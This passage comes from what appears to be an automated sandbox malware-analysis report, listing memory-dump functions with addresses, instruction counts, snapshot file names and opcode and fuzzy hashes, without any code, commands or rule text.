                                                                                                                                                            • Instruction ID: 0b3a1156a53c87da0bb697abafa4c17c8d102f52d2a5a69f35c9a77b4d1d1684
                                                                                                                                                            • Opcode Fuzzy Hash: 17acc9f39b3aa63286118c2db025515970e56187e133a27f20f97cc31d0981ed
                                                                                                                                                            • Instruction Fuzzy Hash: 6EF0E2A5B0F90F8AFB35E69094311F8669CAF02310F33043AC84E835E6CD1B6B0252D6
                                                                                                                                                            Function 00007FFD9BAA33D1 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1927246357.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9baa0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                                                                                                            • Instruction ID: 0ccf22c2c089bc880df32decc76498644f67affb5f2f674ac5c1d82945694920
                                                                                                                                                            • Opcode Fuzzy Hash: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                                                                                                            • Instruction Fuzzy Hash: E3E06D20F0A00A5EF7B06790C8B03BC22529F95B00F164079E40D932F2CEB86E418715
                                                                                                                                                            Function 00007FFD9BAA3759 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1927246357.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9baa0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 10b0969e33b93409db2631608e9f028983c783cc3072fdf1fdad08d7c15e1af7
                                                                                                                                                            • Instruction ID: 963a39807bcb4a00de08b2662d6e86f96dde13e85d78571ee31fd55478a50476
                                                                                                                                                            • Opcode Fuzzy Hash: 10b0969e33b93409db2631608e9f028983c783cc3072fdf1fdad08d7c15e1af7
                                                                                                                                                            • Instruction Fuzzy Hash: 62E0EC11F5E64906F3A8A6AC04323B49086AFA8B10F0A4179E44EC22D3DD882D4003A6
                                                                                                                                                            Function 00007FFD9BEA21F7 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 36880f3a373b680b6c58e2fc4e6ce400d2fdc3b31fcd0d4ab16746f03a32905d
                                                                                                                                                            • Instruction ID: 100b66ee4740ef072c476c667ae65b85bee081e3500a1cbf25147a14f744be2b
                                                                                                                                                            • Opcode Fuzzy Hash: 36880f3a373b680b6c58e2fc4e6ce400d2fdc3b31fcd0d4ab16746f03a32905d
                                                                                                                                                            • Instruction Fuzzy Hash: F5D02BC1F0F78D4BF73705F009720741B5C8F2B34070B05B6D5465A1E3D8493A015321
                                                                                                                                                            Function 00007FFD9BAA06AD Relevance: .0, Instructions: 13COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1927246357.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9baa0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                                                                                                            • Instruction ID: b6c5dbb8b54452122f4efe1a74f4aaf005362be09c027cbe908566e660aa93d5
                                                                                                                                                            • Opcode Fuzzy Hash: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                                                                                                            • Instruction Fuzzy Hash: 86C04C05F5B55F41E47533EE54660ADB2435BC4F28FD71172D50C800B59CDD22D9027E
                                                                                                                                                            Function 00007FFD9BAA0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1927246357.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9baa0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                                                                                                            • Instruction ID: 0f04599e0b38019481d7bcdfeda4256f8c6a9f10709afc8d801985d06927a7f5
                                                                                                                                                            • Opcode Fuzzy Hash: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                                                                                                            • Instruction Fuzzy Hash: 3CC04C305218098FC954EB6DC99595476A0FB0D215BD60190E44DC7171E65A9D95C741
                                                                                                                                                            Function 00007FFD9BAA12E0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1927246357.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9baa0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                                                                                                            • Instruction ID: 12de12477bfb02b18b453ce62293545fa93bf79a43d3ba96f0bd91af7c7661e6
                                                                                                                                                            • Opcode Fuzzy Hash: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                                                                                                            • Instruction Fuzzy Hash: 23C08C3062180D8FC948EB28C88880433E0FB09300BC20090E008C7170E259DCC0CB40
                                                                                                                                                            Function 00007FFD9BEA2CDB Relevance: .0, Instructions: 11COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1ac4479dc4ecda53c7ef179598888d22d19020913b4f5b8224d51f26ee595786
                                                                                                                                                            • Instruction ID: d47808ce573721442ced157c0321ff7427df7945d334081c13b8bdae3003d3b2
                                                                                                                                                            • Opcode Fuzzy Hash: 1ac4479dc4ecda53c7ef179598888d22d19020913b4f5b8224d51f26ee595786
                                                                                                                                                            • Instruction Fuzzy Hash: 2DD09294B0E60F85F17946C14670339629D6F40701E66843AC89F658E1892EB701B205
                                                                                                                                                            Function 00007FFD9BAA57D9 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1927246357.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9baa0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 40635bbee36cbf9490b46126bac33f3783e2d9d539846a11aaa43cfa5e43ed44
                                                                                                                                                            • Instruction ID: e094addbf403c8957e3ecdad62b92aded2b5a86a405f4efb4057912b7a6301fd
                                                                                                                                                            • Opcode Fuzzy Hash: 40635bbee36cbf9490b46126bac33f3783e2d9d539846a11aaa43cfa5e43ed44
                                                                                                                                                            • Instruction Fuzzy Hash: 1DC04C01F29C5A17E25A6654483167E04475F55B29F594274F01EC66DECD5C5B0106C6
                                                                                                                                                            Function 00007FFD9BAA06D0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1927246357.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9baa0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                                                                                                            • Instruction ID: f3473701f756c6bf663705ecfe2fcd220fab0ff0052c1e17b6dd9cd7702cf397
                                                                                                                                                            • Opcode Fuzzy Hash: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                                                                                                            • Instruction Fuzzy Hash: 7DB01200D5740F00E43433FA089206870425B44200FC20070D40C80095D8CD22980377
                                                                                                                                                            Function 00007FFD9BEAC0FF Relevance: .0, Instructions: 8COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 69fa4278d479ece754e505f5c5d0ae7e5a2276a16017c83414430a0cc881e251
                                                                                                                                                            • Instruction ID: 6bd010b216efad31f6bd9ed3bcb4792b00f1e6344071e03a1becaee3e50e3ea2
                                                                                                                                                            • Opcode Fuzzy Hash: 69fa4278d479ece754e505f5c5d0ae7e5a2276a16017c83414430a0cc881e251
                                                                                                                                                            • Instruction Fuzzy Hash: 9CC04C80F0F2465AEA3191E008A107D0A5D1F162457560575D14A462E3DC4DAA055221
                                                                                                                                                            Function 00007FFD9BEA7241 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1396a6a5799ec9228f2375124eea1be95ad0cf95695e436ed63ce9a65db8d41b
                                                                                                                                                            • Instruction ID: c027193d32561e8018066b5873c65894e7a8fa903d8acad4554deb13b0f323f0
                                                                                                                                                            • Opcode Fuzzy Hash: 1396a6a5799ec9228f2375124eea1be95ad0cf95695e436ed63ce9a65db8d41b
                                                                                                                                                            • Instruction Fuzzy Hash: 53B01280F0E20B83F13040F1187007C004D1F45344E120534E20B451E3ECCD3A4021A5

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00007FFD9BAD0D7C Relevance: .3, Instructions: 263COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000020.00000002.2190555784.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9bad0000_DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 18442fe647e39cc2c9cbfb4d3fd5afb44e15395e3a3388926263ea1737e49d2e
                                                                                                                                                            • Instruction ID: 36d745e35f9dfe855a31c3b151b9c09c0707a8aed5e2fc657db72c88a5940f7a
                                                                                                                                                            • Opcode Fuzzy Hash: 18442fe647e39cc2c9cbfb4d3fd5afb44e15395e3a3388926263ea1737e49d2e
                                                                                                                                                            • Instruction Fuzzy Hash: B391C371E18A898FE799DB6888697A97FE1FF99325F0002BED049D72D6CBB81401C741
                                                                                                                                                            Function 00007FFD9BAD0998 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000020.00000002.2190555784.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9bad0000_DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3b0e6bc753c9783479c3fee7d9fd37a20259b2a5046c9fc7da042bdbef8d1d32
                                                                                                                                                            • Instruction ID: 1de7b4f258a881b9ef7a7c87fa4eadd8eb8cc669ca55e9ffecc903e8d84415ba
                                                                                                                                                            • Opcode Fuzzy Hash: 3b0e6bc753c9783479c3fee7d9fd37a20259b2a5046c9fc7da042bdbef8d1d32
                                                                                                                                                            • Instruction Fuzzy Hash: 5A312621B1D90E4FEBA8F77C986A6793AC2EFD8320B4502B9E40DC32F7DD58AC014240
                                                                                                                                                            Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000020.00000002.2190555784.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9bad0000_DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 54fa92b82b18cf26020e213f1a84ca9fe4a11f9cdd1067c159a593b057dd8811
                                                                                                                                                            • Instruction ID: 41c8194cf013a326ae71f976f60610ea063eee0c1fdd5a2b45e83da3c986f442
                                                                                                                                                            • Opcode Fuzzy Hash: 54fa92b82b18cf26020e213f1a84ca9fe4a11f9cdd1067c159a593b057dd8811
                                                                                                                                                            • Instruction Fuzzy Hash: F921E331A0E2898FE731DBA888652EC7FB0EF82325F4642BBD0448B1E2D5782645C745
                                                                                                                                                            Function 00007FFD9BAD0C40 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000020.00000002.2190555784.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9bad0000_DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 834c677e2cda4c8ee092c6369fa933d2ecc6d1a0855ccf0c1a32b4c58d47d8aa
                                                                                                                                                            • Instruction ID: 675736eb42f7e30d1ff880600103eaefd5511201ff1c94608810d4f6e7b01ea3
                                                                                                                                                            • Opcode Fuzzy Hash: 834c677e2cda4c8ee092c6369fa933d2ecc6d1a0855ccf0c1a32b4c58d47d8aa
                                                                                                                                                            • Instruction Fuzzy Hash: 2901C431A0E78C8FE722DBA8D8602DD7FB0EF52311F4646E7D084DB2A2D5745648CB80
                                                                                                                                                            Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000020.00000002.2190555784.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9bad0000_DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0684e03922b5b9bc44e33c95897b627a65bbb007438cc73c7cf99cd204e3b8b7
                                                                                                                                                            • Instruction ID: 48621101301268dd590b8cbc1c2c0ccf962c63d3feeae9b033813d185d2e92c8
                                                                                                                                                            • Opcode Fuzzy Hash: 0684e03922b5b9bc44e33c95897b627a65bbb007438cc73c7cf99cd204e3b8b7
                                                                                                                                                            • Instruction Fuzzy Hash: 1F01B531A0E38C8FD722DBA4C8602DD7FB0AF42314F1542E7D044DB1A2D5745644C740
                                                                                                                                                            Function 00007FFD9BAD1A46 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000020.00000002.2190555784.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9bad0000_DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8367c8bdb857e1176618c797a617b5d98cfe07e7596ba075489ecce1294c49c6
                                                                                                                                                            • Instruction ID: ca30e5be4cb6c3b2c5e8fa8fd8e04d1b04a9d5af4a955657e5d8e83804f86859
                                                                                                                                                            • Opcode Fuzzy Hash: 8367c8bdb857e1176618c797a617b5d98cfe07e7596ba075489ecce1294c49c6
                                                                                                                                                            • Instruction Fuzzy Hash: 7C011D31A08918CFCB58DB08D894EA973F1FBA8310F0102A9D40ED72A1CA35AE81CF81
                                                                                                                                                            Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000020.00000002.2190555784.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9bad0000_DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 40527a46c2ea9fbed07ada2bab8c64cf212f62eea793853982843e9af7ce9241
                                                                                                                                                            • Instruction ID: e9a0f60f02201791022cc5d6e407d68bef20b6c2bd762157e7bd5174a658a4da
                                                                                                                                                            • Opcode Fuzzy Hash: 40527a46c2ea9fbed07ada2bab8c64cf212f62eea793853982843e9af7ce9241
                                                                                                                                                            • Instruction Fuzzy Hash: DA01A231A0E3888FE722EBA4C8642DD7FB0AF56314F5542E7D494DB2A2D5785644C741
                                                                                                                                                            Function 00007FFD9BAD563C Relevance: .0, Instructions: 34COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000020.00000002.2190555784.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9bad0000_DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
                                                                                                                                                            • Instruction ID: c6c22c7c09de0ce174589799f6b74c7e3d4f48098209af38e8ab997e469f8455
                                                                                                                                                            • Opcode Fuzzy Hash: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
                                                                                                                                                            • Instruction Fuzzy Hash: 47F09030A0950D8EEA75EB44DC646BC33D2EF94310F1203B5D84ED31B2ED686F858644